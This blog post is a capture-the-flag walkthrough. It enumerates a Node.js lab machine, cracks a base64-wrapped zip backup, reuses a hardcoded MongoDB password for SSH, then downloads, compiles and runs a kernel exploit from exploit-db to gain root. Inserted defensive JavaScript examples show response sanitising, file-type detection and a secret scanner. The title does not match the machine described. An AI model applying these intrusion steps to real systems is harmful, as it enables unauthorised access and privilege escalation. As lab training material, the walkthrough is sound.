Hello, in this article I will show you step by step how to solve Tr0ll 1. The purpose of this CTF will be to become root and read /root/flag. Click to get more information about CTF.
LEVEL: Medium
Steps
- Learning the target’s IP address with Netdiscover tool
- Detection of open ports with Nmap tool
- Collecting information via port 80 with Dirb and Nikto tools
- Performing a Zip Password Brute Force attack with Fcrackzip tool
- Code review to detect a hardcoded secret
- Becoming root using Kernel Exploit
Based on the IP information of the Kali machine, the IP address of the target machine was determined with the following command.
netdiscover -r 192.168.1.0/24
The detection of open ports on the target machine was done as follows.
nmap -A -Pn -n -sV --reason -p- 192.168.1.11
Fuzzing was performed via dirb on open port 3000.
dirb http://192.168.1.11:3000 -f
To obtain more information specifically for port 3000, a tool called nikto was used.
nikto -h 192.168.1.11:3000
With the information obtained from Nikto and Dirb, manual checks were started on port 3000. Some JS files are noted below for review.
When the content of the noted JS files was checked, a redirect was made to the address below, and content containing usernames, hashed passwords and role information was detected. This data was noted and the checks were continued.
Following these checks, a user with “is_admin=true” was detected.
To obtain the cleartext versions of the obtained password hashes, the following web application was used, and the recovered passwords were noted.
Below, it is shown which of the recovered passwords belongs to which user.
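The root cause of this step is an API response that serialises whole user records, hashes and role flags included. The following is an added example, not code from the original post or from the target application: an allow-list serialiser for a Node.js user listing, plus a guard that walks the outgoing body (nested objects and arrays included) and refuses to send it if any field whose name looks like a secret survived. The field names, sample records and hash values are constructed placeholders.

```javascript
// Added example (not from the original post or the target application):
// keep password hashes and role flags out of API responses by allow-listing
// fields, then fail closed if anything sensitive is still in the body.
'use strict';

// Fields a user listing may expose. Everything else is dropped, so a
// sensitive column added to the database later is not leaked by default.
const PUBLIC_USER_FIELDS = ['_id', 'username'];

// Field names that must never appear anywhere in a response body.
const SENSITIVE_FIELD_RE = /^(password|passwd|pwd|pass_hash|hash|salt|secret|token|is_admin)$/i;

function toPublicUser(user) {
  const out = {};
  for (const field of PUBLIC_USER_FIELDS) {
    if (Object.prototype.hasOwnProperty.call(user, field)) out[field] = user[field];
  }
  return out;
}

// Returns JSONPath-like locations of sensitive keys found anywhere in `value`.
function findSensitiveFields(value, path = '$') {
  const hits = [];
  if (Array.isArray(value)) {
    value.forEach((item, i) => hits.push(...findSensitiveFields(item, `${path}[${i}]`)));
  } else if (value !== null && typeof value === 'object') {
    for (const [key, child] of Object.entries(value)) {
      const childPath = `${path}.${key}`;
      if (SENSITIVE_FIELD_RE.test(key)) hits.push(childPath);
      hits.push(...findSensitiveFields(child, childPath));
    }
  }
  return hits;
}

// What a /users handler should hand to res.json(): the sanitised list, or an
// error if anything sensitive survived (better to fail than to leak).
function buildUsersResponse(records) {
  const body = records.map(toPublicUser);
  const leaks = findSensitiveFields(body);
  if (leaks.length > 0) {
    throw new Error(`refusing to send response, sensitive fields at: ${leaks.join(', ')}`);
  }
  return body;
}

// Constructed sample records; the hash and token values are placeholders,
// not credentials from any real system.
const SAMPLE_RECORDS = [
  { _id: 'u1', username: 'alice', password: 'CONSTRUCTED_HASH_1', is_admin: false },
  { _id: 'u2', username: 'admin-user', password: 'CONSTRUCTED_HASH_2', is_admin: true,
    profile: { secret: 'CONSTRUCTED_TOKEN' } },
];

const RAW_LEAKS = findSensitiveFields(SAMPLE_RECORDS);      // what the raw records would expose
const SAFE_RESPONSE = buildUsersResponse(SAMPLE_RECORDS);   // what actually gets sent
console.log('raw records would leak:', RAW_LEAKS);
console.log('safe response:', JSON.stringify(SAFE_RESPONSE));
```

The guard deliberately treats `is_admin` as sensitive: a listing that tells every caller which account is the administrator narrows an attacker's choice of target, so role information belongs in the caller's own profile or behind an admin-only endpoint, not in a public user list.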
First, SSH login was tried with the user information obtained; when no results were obtained, the application interface was logged into with the obtained users.
When the user “myP14ceAdm1nAcc0uNT”, which has admin authority, logged into the application interface, it was determined that there was a “download backup” button, unlike for the other users. A backup file named “myplace.backup” was downloaded.
Some checks were made on the extension of the downloaded file, but no results were obtained. Finally, the content was base64 decoded and the result written to a file named tmp. The downloaded file is actually a zip, but it turned out that it had been base64 encoded and written into “myplace.backup”.
cat myplace.backup | base64 -d > tmp
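The lesson of this step is that an extension says nothing about what a file is; the leading bytes do. The following is an added example, not code from the original post: it identifies a downloaded file from its signature bytes and, when the bytes are not a recognised format but form valid base64, decodes and checks again. It goes beyond the single decode above by unwrapping repeated base64 layers, with a depth limit. The sample backup is a constructed stand-in (a zip local-file-header prefix plus filler, wrapped twice), not the file from the post.

```javascript
// Added example (not from the original post): identify what a "backup"
// really is from its leading bytes, peeling off base64 wrapping as needed.
'use strict';

// Leading-byte signatures for a few container and executable formats.
const SIGNATURES = [
  { type: 'zip', bytes: [0x50, 0x4b, 0x03, 0x04] },       // "PK\x03\x04", local file header
  { type: 'zip-empty', bytes: [0x50, 0x4b, 0x05, 0x06] }, // end-of-central-directory only
  { type: 'gzip', bytes: [0x1f, 0x8b] },
  { type: 'elf', bytes: [0x7f, 0x45, 0x4c, 0x46] },
  { type: 'pdf', bytes: [0x25, 0x50, 0x44, 0x46] },
];

function identify(buf) {
  for (const sig of SIGNATURES) {
    if (buf.length >= sig.bytes.length && sig.bytes.every((b, i) => buf[i] === b)) {
      return sig.type;
    }
  }
  return 'unknown';
}

// Strict base64 check. Buffer.from(text, 'base64') silently skips invalid
// characters, so validate first or binary junk "decodes" to more junk.
const BASE64_RE = /^[A-Za-z0-9+/]+={0,2}$/;

function isBase64Text(text) {
  return text.length > 0 && text.length % 4 === 0 && BASE64_RE.test(text);
}

// Returns { type, data, layers }: the innermost recognisable payload and how
// many base64 layers were removed. Stops at maxLayers so a file that happens
// to look like base64 all the way down cannot loop forever.
function unwrapBackup(raw, maxLayers = 4) {
  let data = raw;
  let layers = 0;
  while (layers < maxLayers) {
    const type = identify(data);
    if (type !== 'unknown') return { type, data, layers };
    const text = data.toString('latin1').replace(/\s+/g, '');
    if (!isBase64Text(text)) break;
    data = Buffer.from(text, 'base64');
    layers += 1;
  }
  return { type: identify(data), data, layers };
}

// Constructed stand-in for a downloaded backup: a zip header prefix plus
// filler bytes, base64-encoded twice, with a trailing newline as base64 tools
// usually emit. Not a real archive and not the file from the post.
const INNER = Buffer.concat([Buffer.from([0x50, 0x4b, 0x03, 0x04]), Buffer.from('constructed filler')]);
const SAMPLE_BACKUP = Buffer.from(
  Buffer.from(INNER.toString('base64')).toString('base64') + '\n'
);

const RESULT = unwrapBackup(SAMPLE_BACKUP);
console.log(`type=${RESULT.type} layers=${RESULT.layers} bytes=${RESULT.data.length}`);
```

On a real file, read it with `fs.readFileSync(path)` and pass the resulting Buffer to `unwrapBackup`; the `layers` count is what tells you whether the download was wrapped at all, which is the check that "looking at the extension" cannot give.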
The tmp file asks for a password when unzipped. In this step, fcrackzip was used to guess the password, with the rockyou wordlist provided. As a result, “magicword” was found.
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt ./tmp
Unzip using “magicword” is done as follows.
When the contents of the var folder obtained after the unzip process were checked, it was determined that it also contained the source code of the NodeJS application running on port 3000.
When the source code was reviewed, it was understood that the application was using MongoDB in the background, and that this connection was made with the following connection string.
Using the username and password obtained, “mark:5AYRft79VtFpc84”, the SSH checks from the previous steps were repeated, and this time access to the machine was obtained.
Some attempts were made at privilege escalation, but no results were obtained. The final step is to download an exploit suitable for the kernel version of the target machine, become root, and then read the root flag. Below, this process is carried out step by step.
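Two defects combine here: a database password committed into the source, and that same password reused for an SSH account. The first one is cheap to catch before a backup ever ships. The following is an added example, not code from the original post or from the target application: a small scanner that flags credentials embedded in source text, such as a `scheme://user:password@host` connection string or a secret assigned from a string literal, and reports each hit with the secret masked so the report itself is not a second leak. The sample source file, its file name and its credential values are constructed.

```javascript
// Added example (not from the original post or the target application):
// flag hardcoded credentials in source files, masking the secret in the report.
'use strict';

const RULES = [
  {
    name: 'connection string with embedded credentials',
    // scheme://user:password@host[:port][/path], e.g. a database URL
    re: /\b([a-z][a-z0-9+.-]*):\/\/([^\s:@\/'"`]+):([^\s@'"`]+)@([^\s'"`]+)/gi,
    redact: (m) => `${m[1]}://${m[2]}:***@${m[4]}`,
  },
  {
    name: 'secret assigned from a string literal',
    // password = '...', apiKey: "...", token = `...` (4+ chars, no env lookups)
    re: /\b(password|passwd|pwd|secret|api[_-]?key|token)\b\s*[:=]\s*(['"`])([^'"`]{4,})\2/gi,
    redact: (m) => `${m[1]} = ***`,
  },
];

// Scans one file's text; returns findings with 1-based line numbers and a
// redacted snippet. The global regexes are reset per line so a previous
// match cannot skip the start of the next line.
function scanSource(fileName, source) {
  const findings = [];
  source.split('\n').forEach((line, idx) => {
    for (const rule of RULES) {
      rule.re.lastIndex = 0;
      let m;
      while ((m = rule.re.exec(line)) !== null) {
        findings.push({ file: fileName, line: idx + 1, rule: rule.name, redacted: rule.redact(m) });
      }
    }
  });
  return findings;
}

// Constructed sample source; the credential values are placeholders.
const SAMPLE_FILE = 'app.js';
const SAMPLE_SOURCE = [
  "const mongoose = require('mongoose');",
  '// BAD: credentials hardcoded in the file (constructed values, not real)',
  "const url = 'mongodb://appuser:CONSTRUCTED-pw-42@localhost:27017/myplace';",
  "const apiKey = 'CONSTRUCTED-api-key-7';",
  '// GOOD: read from the environment instead; nothing below should be flagged',
  'const safeUrl = process.env.MONGO_URL;',
  "const login = 'http://localhost:3000/login';",
].join('\n');

const FINDINGS = scanSource(SAMPLE_FILE, SAMPLE_SOURCE);
for (const f of FINDINGS) {
  console.log(`${f.file}:${f.line}: ${f.rule}: ${f.redacted}`);
}
```

Run this over every file in a backup or repository before it leaves the build, and treat any finding as a rotate-the-credential event, not just a code fix: once a password has been in a file that was backed up or committed, the defence is to change it, and to make sure it is not shared with any other account, which is exactly what let the database password open an SSH session here.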
wget https://www.exploit-db.com/download/44298
mv 44298 44298.c
gcc 44298.c -o exploit
./exploit
Summary
- I think it is an enjoyable machine with simple scenarios such as port enumeration, zip crack, Code Review and kernel exploitation. I recommend you figure it out at the beginning.
Click here to see my other articles about OSCP walkthroughs.